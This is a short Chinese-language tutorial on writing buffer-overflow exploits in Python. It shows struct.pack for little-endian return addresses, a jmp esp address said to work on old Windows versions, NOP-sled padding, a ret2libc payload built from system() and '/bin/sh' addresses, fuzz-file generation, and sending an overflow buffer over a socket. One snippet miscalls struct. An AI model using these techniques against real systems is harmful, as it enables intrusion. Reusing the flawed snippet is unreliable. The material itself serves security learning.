用 Python 写 Exploit

struct 模块有个很方便的函数，pack，格式如下：

struct.pack(format，参数)

将参数内容转换成 format 中指定的格式。写 shellcode 时，需要将覆盖地址倒序（little-endian）排列，为了方便，咱们可以使用这个函数。咱们要用到的指定格式是"<L”，以无符号长整型的 little-endian 格式。

0x7ffa4512 是通杀 Windows 2000/XP/2003 的 jmp esp 地址，以它为例：

import struct
struct.pack('<L',0x7ffa4512)

溢出测试时，常常需要生成一长串字符串去填充缓冲区，用循环的话比较麻烦。Python 中直接可以用乘号来操作字符串：

shellcode = '\x90' * 1000

执行后，shellcode 的值为1000个 \x90。

同时也可以用加号来操作字符串，连接两个字符串的例子如下：

import struct
buffer = 'A' * 100
jmpesp = struct('<L', 0x7ffa4512) #将0x7ffa4512转化为\x12\x45\xfa\x7f的格式
buffer += jmpesp

在 Python 中“+=”与 C 语言中的“+=”用法一样，buffer += jmpesp 等同于 buffer = buffer + jmpesp，当然也可以用后者来表示。

注意如果用的 Python3，想要以二进制格式打印字符，需要 sys.stdout.buffer.write，示范如下：

import sys
import struct

system_addr = 0xf7e2b010 + 0x6000
sh_str_addr = 0xf7f43fa6 + 0x6000

shellcode = b"A" * 11
shellcode += struct.pack("<L", system_addr)
shellcode += b"AAAA"
shellcode += struct.pack("<L", sh_str_addr)
sys.stdout.buffer.write(shellcode)

ord 函数可用于将指定字符转换成 ASCII 码，函数声明：ord(字符)

例：

print(ord('A')) # 输出：65

注意 ord 函数只接受字符，不能接受字符串。

对读取文件时发生溢出的程序来说，需要生成一个带有测试代码的文件。Python 提供了方便的文件操作函数。

with open('test', 'w') as f:
    payload = 'A' * 5000
    f.write(payload)

执行以上代码后，会在当前目录下生成一个内容为5000个 A 的、文件名为 test 的文件。

有时需要对网络程序进行安全性测试，Python 也提供了 socket 编程。需要使用 socket 模板。

import socket
shellcode = 'A' * 1000
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1", 200))
s.send(shellcode)

该例子可以用在 FTP Server 之类的网络程序进行测试。